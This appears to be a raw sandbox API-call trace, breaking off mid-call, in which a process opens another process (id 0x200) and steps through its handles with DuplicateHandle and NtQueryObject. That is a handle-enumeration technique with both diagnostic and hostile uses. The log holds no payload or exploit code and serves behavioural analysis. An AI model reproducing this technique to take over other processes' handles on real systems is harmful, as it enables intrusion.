[0113.144] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.144] GetTickCount () returned 0xe86307 [0113.144] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.144] GetTickCount () returned 0xe86307 [0113.144] GetTickCount () returned 0xe86307 [0113.144] CloseHandle (hObject=0x1b8) returned 1 [0113.144] GetTickCount () returned 0xe86307 [0113.144] CloseHandle (hObject=0x198) returned 1 [0113.144] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.144] GetTickCount () returned 0xe86307 [0113.145] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x100, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.145] GetTickCount () returned 0xe86307 [0113.145] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.145] GetTickCount () returned 0xe86307 [0113.145] GetTickCount () returned 0xe86307 [0113.145] CloseHandle (hObject=0x1b8) returned 1 [0113.145] GetTickCount () returned 0xe86307 [0113.145] CloseHandle (hObject=0x198) returned 1 [0113.145] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.145] GetTickCount () returned 0xe86307 [0113.145] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x104, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.145] GetTickCount () returned 0xe86307 [0113.145] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.145] GetTickCount () returned 0xe86307 [0113.146] GetTickCount () returned 0xe86307 [0113.146] CloseHandle (hObject=0x1b8) returned 1 [0113.146] GetTickCount () returned 0xe86307 [0113.146] CloseHandle (hObject=0x198) returned 1 [0113.146] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.146] GetTickCount () returned 0xe86307 [0113.146] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x108, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.146] GetTickCount () returned 0xe86307 [0113.146] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.146] GetTickCount () returned 0xe86307 [0113.146] GetTickCount () returned 0xe86307 [0113.146] CloseHandle (hObject=0x1b8) returned 1 [0113.146] GetTickCount () returned 0xe86307 [0113.147] CloseHandle (hObject=0x198) returned 1 [0113.147] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.147] GetTickCount () returned 0xe86307 [0113.147] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.147] GetTickCount () returned 0xe86307 [0113.147] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.147] GetTickCount () returned 0xe86307 [0113.147] GetTickCount () returned 0xe86307 [0113.147] CloseHandle (hObject=0x1b8) returned 1 [0113.147] GetTickCount () returned 0xe86307 [0113.147] CloseHandle (hObject=0x198) returned 1 [0113.147] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.147] GetTickCount () returned 0xe86307 [0113.147] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.148] GetTickCount () returned 0xe86316 [0113.148] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.148] GetTickCount () returned 0xe86316 [0113.148] GetTickCount () returned 0xe86316 [0113.148] CloseHandle (hObject=0x1b8) returned 1 [0113.148] GetTickCount () returned 0xe86316 [0113.148] CloseHandle (hObject=0x198) returned 1 [0113.148] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.148] GetTickCount () returned 0xe86316 [0113.148] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.148] GetTickCount () returned 0xe86316 [0113.148] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.148] GetTickCount () returned 0xe86316 [0113.148] GetTickCount () returned 0xe86316 [0113.148] CloseHandle (hObject=0x1b8) returned 1 [0113.149] GetTickCount () returned 0xe86316 [0113.149] CloseHandle (hObject=0x198) returned 1 [0113.149] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.149] GetTickCount () returned 0xe86316 [0113.149] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x118, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.149] GetTickCount () returned 0xe86316 [0113.149] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.149] GetTickCount () returned 0xe86316 [0113.149] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0113.149] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x86, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.149] GetTickCount () returned 0xe86316 [0113.149] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.149] GetTickCount () returned 0xe86316 [0113.149] CloseHandle (hObject=0x1b8) returned 1 [0113.149] GetTickCount () returned 0xe86316 [0113.149] CloseHandle (hObject=0x198) returned 1 [0113.149] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.150] GetTickCount () returned 0xe86316 [0113.150] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.150] GetTickCount () returned 0xe86316 [0113.150] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.150] GetTickCount () returned 0xe86316 [0113.150] GetTickCount () returned 0xe86316 [0113.150] CloseHandle (hObject=0x1b8) returned 1 [0113.150] GetTickCount () returned 0xe86316 [0113.150] CloseHandle (hObject=0x198) returned 1 [0113.150] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.150] GetTickCount () returned 0xe86316 [0113.150] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x120, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.150] GetTickCount () returned 0xe86316 [0113.150] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.151] GetTickCount () returned 0xe86316 [0113.151] GetTickCount () returned 0xe86316 [0113.151] CloseHandle (hObject=0x1b8) returned 1 [0113.151] GetTickCount () returned 0xe86316 [0113.151] CloseHandle (hObject=0x198) returned 1 [0113.151] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.151] GetTickCount () returned 0xe86316 [0113.151] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x124, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.151] GetTickCount () returned 0xe86316 [0113.151] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.151] GetTickCount () returned 0xe86316 [0113.151] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.151] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.151] GetTickCount () returned 0xe86316 [0113.151] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.151] GetTickCount () returned 0xe86316 [0113.152] CloseHandle (hObject=0x1b8) returned 1 [0113.152] GetTickCount () returned 0xe86316 [0113.152] CloseHandle (hObject=0x198) returned 1 [0113.152] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.152] GetTickCount () returned 0xe86316 [0113.152] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x128, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.152] GetTickCount () returned 0xe86316 [0113.152] GetTickCount () returned 0xe86316 [0113.152] CloseHandle (hObject=0x198) returned 1 [0113.152] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.152] GetTickCount () returned 0xe86316 [0113.152] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.152] GetTickCount () returned 0xe86316 [0113.152] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.153] GetTickCount () returned 0xe86316 [0113.153] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.153] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.153] GetTickCount () returned 0xe86316 [0113.153] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.153] GetTickCount () returned 0xe86316 [0113.153] CloseHandle (hObject=0x1b8) returned 1 [0113.153] GetTickCount () returned 0xe86316 [0113.155] CloseHandle (hObject=0x198) returned 1 [0113.155] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.155] GetTickCount () returned 0xe86316 [0113.155] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x134, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.155] GetTickCount () returned 0xe86316 [0113.155] GetTickCount () returned 0xe86316 [0113.155] CloseHandle (hObject=0x198) returned 1 [0113.155] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.155] GetTickCount () returned 0xe86316 [0113.155] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x138, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.156] GetTickCount () returned 0xe86316 [0113.156] GetTickCount () returned 0xe86316 [0113.156] CloseHandle (hObject=0x198) returned 1 [0113.156] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.156] GetTickCount () returned 0xe86316 [0113.156] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.156] GetTickCount () returned 0xe86316 [0113.156] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.156] GetTickCount () returned 0xe86316 [0113.156] GetTickCount () returned 0xe86316 [0113.156] CloseHandle (hObject=0x1b8) returned 1 [0113.156] GetTickCount () returned 0xe86316 [0113.156] CloseHandle (hObject=0x198) returned 1 [0113.156] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.157] GetTickCount () returned 0xe86316 [0113.157] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x140, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.157] GetTickCount () returned 0xe86316 [0113.157] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.157] GetTickCount () returned 0xe86316 [0113.157] GetTickCount () returned 0xe86316 [0113.157] CloseHandle (hObject=0x1b8) returned 1 [0113.157] GetTickCount () returned 0xe86316 [0113.157] CloseHandle (hObject=0x198) returned 1 [0113.157] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.157] GetTickCount () returned 0xe86316 [0113.157] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x144, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.157] GetTickCount () returned 0xe86316 [0113.157] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.158] GetTickCount () returned 0xe86316 [0113.158] GetTickCount () returned 0xe86316 [0113.158] CloseHandle (hObject=0x1b8) returned 1 [0113.158] GetTickCount () returned 0xe86316 [0113.158] CloseHandle (hObject=0x198) returned 1 [0113.158] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.158] GetTickCount () returned 0xe86316 [0113.158] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x148, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.158] GetTickCount () returned 0xe86316 [0113.158] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.158] GetTickCount () returned 0xe86316 [0113.158] GetTickCount () returned 0xe86316 [0113.158] CloseHandle (hObject=0x1b8) returned 1 [0113.158] GetTickCount () returned 0xe86316 [0113.159] CloseHandle (hObject=0x198) returned 1 [0113.159] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.159] GetTickCount () returned 0xe86316 [0113.159] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.159] GetTickCount () returned 0xe86316 [0113.159] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.159] GetTickCount () returned 0xe86316 [0113.159] GetTickCount () returned 0xe86316 [0113.159] CloseHandle (hObject=0x1b8) returned 1 [0113.159] GetTickCount () returned 0xe86316 [0113.159] CloseHandle (hObject=0x198) returned 1 [0113.159] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.159] GetTickCount () returned 0xe86316 [0113.159] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x150, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.159] GetTickCount () returned 0xe86316 [0113.160] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.160] GetTickCount () returned 0xe86316 [0113.160] GetTickCount () returned 0xe86316 [0113.160] CloseHandle (hObject=0x1b8) returned 1 [0113.160] GetTickCount () returned 0xe86316 [0113.160] CloseHandle (hObject=0x198) returned 1 [0113.160] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.160] GetTickCount () returned 0xe86316 [0113.160] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x154, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.160] GetTickCount () returned 0xe86316 [0113.160] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.160] GetTickCount () returned 0xe86316 [0113.160] GetTickCount () returned 0xe86316 [0113.160] CloseHandle (hObject=0x1b8) returned 1 [0113.161] GetTickCount () returned 0xe86316 [0113.161] CloseHandle (hObject=0x198) returned 1 [0113.161] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.161] GetTickCount () returned 0xe86316 [0113.161] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x158, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.161] GetTickCount () returned 0xe86316 [0113.161] GetTickCount () returned 0xe86316 [0113.161] CloseHandle (hObject=0x198) returned 1 [0113.161] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.161] GetTickCount () returned 0xe86316 [0113.161] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.161] GetTickCount () returned 0xe86316 [0113.161] GetTickCount () returned 0xe86316 [0113.161] CloseHandle (hObject=0x198) returned 1 [0113.162] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.162] GetTickCount () returned 0xe86316 [0113.162] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x160, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.162] GetTickCount () returned 0xe86316 [0113.162] GetTickCount () returned 0xe86316 [0113.162] CloseHandle (hObject=0x198) returned 1 [0113.162] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.162] GetTickCount () returned 0xe86316 [0113.162] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x164, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.162] GetTickCount () returned 0xe86316 [0113.162] GetTickCount () returned 0xe86316 [0113.162] CloseHandle (hObject=0x198) returned 1 [0113.162] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.162] GetTickCount () returned 0xe86316 [0113.163] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x168, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.163] GetTickCount () returned 0xe86316 [0113.163] GetTickCount () returned 0xe86316 [0113.163] CloseHandle (hObject=0x198) returned 1 [0113.163] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.163] GetTickCount () returned 0xe86316 [0113.163] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.163] GetTickCount () returned 0xe86316 [0113.163] GetTickCount () returned 0xe86316 [0113.163] CloseHandle (hObject=0x198) returned 1 [0113.163] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.163] GetTickCount () returned 0xe86316 [0113.163] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.163] GetTickCount () returned 0xe86326 [0113.164] GetTickCount () returned 0xe86326 [0113.164] CloseHandle (hObject=0x198) returned 1 [0113.164] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.164] GetTickCount () returned 0xe86326 [0113.164] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x178, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.164] GetTickCount () returned 0xe86326 [0113.164] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.164] GetTickCount () returned 0xe86326 [0113.164] GetTickCount () returned 0xe86326 [0113.164] CloseHandle (hObject=0x1b8) returned 1 [0113.164] GetTickCount () returned 0xe86326 [0113.164] CloseHandle (hObject=0x198) returned 1 [0113.164] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.165] GetTickCount () returned 0xe86326 [0113.165] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.165] GetTickCount () returned 0xe86326 [0113.165] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.165] GetTickCount () returned 0xe86326 [0113.165] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.165] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.165] GetTickCount () returned 0xe86326 [0113.165] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.165] GetTickCount () returned 0xe86326 [0113.165] CloseHandle (hObject=0x1b8) returned 1 [0113.165] GetTickCount () returned 0xe86326 [0113.165] CloseHandle (hObject=0x198) returned 1 [0113.166] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.166] GetTickCount () returned 0xe86326 [0113.166] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x180, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.166] GetTickCount () returned 0xe86326 [0113.166] GetTickCount () returned 0xe86326 [0113.166] CloseHandle (hObject=0x198) returned 1 [0113.166] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.166] GetTickCount () returned 0xe86326 [0113.166] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x184, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.166] GetTickCount () returned 0xe86326 [0113.166] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.166] GetTickCount () returned 0xe86326 [0113.166] GetTickCount () returned 0xe86326 [0113.166] CloseHandle (hObject=0x1b8) returned 1 [0113.166] GetTickCount () returned 0xe86326 [0113.166] CloseHandle (hObject=0x198) returned 1 [0113.167] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.167] GetTickCount () returned 0xe86326 [0113.167] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x188, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 